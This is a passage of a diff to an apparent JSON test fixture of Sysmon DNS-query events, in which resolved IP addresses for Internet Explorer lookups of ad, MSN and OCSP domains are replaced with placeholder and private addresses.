Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.182\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimage2.pubmatic.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pug44000nfc.pubmatic.com;type: 5 pug44000nf.pubmatic.com;::ffff:162.248.19.147;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData 
Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802480600Z'/\u003e\u003cEventRecordID\u003e111\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.182\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimage2.pubmatic.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pug44000nfc.pubmatic.com;type: 5 pug44000nf.pubmatic.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", 
@@ -6076,12 +5997,12 @@ "type": "CNAME" }, { - "data": "204.79.197.203", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.79.197.203" + "89.160.20.156" ] }, "network": { 
@@ -6099,13 +6020,13 @@ "sam.msn.com" ], "ip": [ - "204.79.197.203" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741485500Z", + "ingested": "2021-12-09T13:50:23.456887700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802496100Z'/\u003e\u003cEventRecordID\u003e112\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.183\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esam.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 www.msn.com;type: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:204.79.197.203;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802496100Z'/\u003e\u003cEventRecordID\u003e112\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.183\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esam.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 www.msn.com;type: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -6165,23 +6086,23 @@ }, "answers": [ { - "data": "52.85.89.250", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.85.89.94", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.85.89.22", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.85.89.139", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -6189,7 +6110,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { 
@@ -6197,7 +6118,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -6205,7 +6126,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -6214,17 +6135,17 @@ } ], "resolved_ip": [ - "52.85.89.250", - "52.85.89.94", - "52.85.89.22", - "52.85.89.139", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, 
@@ -6240,24 +6161,21 @@ "ocsp.sca1b.amazontrust.com" ], "ip": [ - "52.85.89.250", - "52.85.89.94", - "52.85.89.22", - "52.85.89.139", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741494100Z", + "ingested": "2021-12-09T13:50:23.456893400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802516200Z'/\u003e\u003cEventRecordID\u003e113\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.222\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.sca1b.amazontrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData 
Name='QueryResults'\u003e::ffff:52.85.89.250;::ffff:52.85.89.94;::ffff:52.85.89.22;::ffff:52.85.89.139;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802516200Z'/\u003e\u003cEventRecordID\u003e113\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.222\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.sca1b.amazontrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -6325,17 +6243,17 @@ "type": "CNAME" }, { - "data": "185.167.164.43", + "data": "89.160.20.156", "type": "A" }, { - "data": "185.167.164.42", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "185.167.164.43", - "185.167.164.42" + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -6352,14 +6270,13 @@ "c1.adform.net" ], "ip": [ - "185.167.164.43", - "185.167.164.42" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741502700Z", + "ingested": "2021-12-09T13:50:23.456899200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802540200Z'/\u003e\u003cEventRecordID\u003e114\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.271\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec1.adform.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 track.adformnet.akadns.net;type: 5 track-us.adformnet.akadns.net;::ffff:185.167.164.43;::ffff:185.167.164.42;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802540200Z'/\u003e\u003cEventRecordID\u003e114\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.271\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec1.adform.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 track.adformnet.akadns.net;type: 5 track-us.adformnet.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -6427,11 +6344,11 @@ "type": "CNAME" }, { - "data": "40.84.140.84", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -6439,7 +6356,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { 
@@ -6447,17 +6364,17 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" } ], "resolved_ip": [ - "40.84.140.84", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30" + "192.168.92.30" ] }, "network": { 
@@ -6474,18 +6391,18 @@ "urs.microsoft.com" ], "ip": [ - "40.84.140.84", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30" + "192.168.92.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741511200Z", + "ingested": "2021-12-09T13:50:23.456905300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802550800Z'/\u003e\u003cEventRecordID\u003e115\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.271\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eurs.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-southcentral-2-fe.southcentralus.cloudapp.azure.com;::ffff:40.84.140.84;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802550800Z'/\u003e\u003cEventRecordID\u003e115\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.271\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eurs.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-southcentral-2-fe.southcentralus.cloudapp.azure.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", 
@@ -6553,12 +6470,12 @@ "type": "CNAME" }, { - "data": "23.52.162.21", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.162.21" + "89.160.20.156" ] }, "network": { 
@@ -6575,13 +6492,13 @@ "dsum-sec.casalemedia.com" ], "ip": [ - "23.52.162.21" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741519800Z", + "ingested": "2021-12-09T13:50:23.456911200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802560700Z'/\u003e\u003cEventRecordID\u003e116\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.290\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edsum-sec.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dsum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:23.52.162.21;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802560700Z'/\u003e\u003cEventRecordID\u003e116\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.290\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edsum-sec.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dsum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -6645,12 +6562,12 @@ "type": "CNAME" }, { - "data": "72.167.239.239", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "72.167.239.239" + "89.160.20.156" ] }, "network": { 
@@ -6666,13 +6583,13 @@ "ocsp.godaddy.com" ], "ip": [ - "72.167.239.239" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741528300Z", + "ingested": "2021-12-09T13:50:23.456917100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802569800Z'/\u003e\u003cEventRecordID\u003e117\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.292\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.godaddy.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.godaddy.com.akadns.net;::ffff:72.167.239.239;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
